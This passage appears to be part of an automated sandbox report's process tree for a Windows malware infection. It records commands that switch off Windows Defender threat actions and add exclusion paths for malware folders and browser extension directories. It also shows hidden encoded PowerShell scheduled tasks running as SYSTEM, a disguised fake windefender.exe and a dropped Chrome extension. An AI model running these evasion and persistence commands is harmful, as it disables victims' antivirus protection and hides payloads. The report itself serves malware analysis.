                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4068
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1448
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4448
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4652
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4076
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5488
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4696
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5976
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6040
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6008
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4792
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3744
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2328
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5588
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5724
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5648
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          PID:5624
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5748
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4164
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1152
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5792
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5516
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:500
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5476
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2836
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5696
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3104
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1572
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:6024
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2820
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:6060
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3732
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5964
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:6080
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5944
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5952
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "gbGzdkxaI" /SC once /ST 13:08:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:2380
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /run /I /tn "gbGzdkxaI"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:6016
                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5724
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "gbGzdkxaI"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:1644
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 00:19:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\sXxfxiL.exe\" aV /yXdOdidmB 385118 /S" /V1 /F
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:2780
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /run /I /tn "yfARWRprRqUFWeTGf"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:2680
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:5136
                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1796
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5232
                                                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:5632
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5536
                                                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2836
                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6064
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:1052
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5648
                                                                                                                                                                                                                                                      • C:\Windows\windefender.exe
                                                                                                                                                                                                                                                        C:\Windows\windefender.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                        PID:560
                                                                                                                                                                                                                                                      • C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\sXxfxiL.exe
                                                                                                                                                                                                                                                        C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\sXxfxiL.exe aV /yXdOdidmB 385118 /S
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        PID:2584
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3708
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:6128
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:6108
                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:5660
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:4848
                                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:5672
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:5772
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:5696
                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:4340
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5792
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:2100
                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                        5⤵
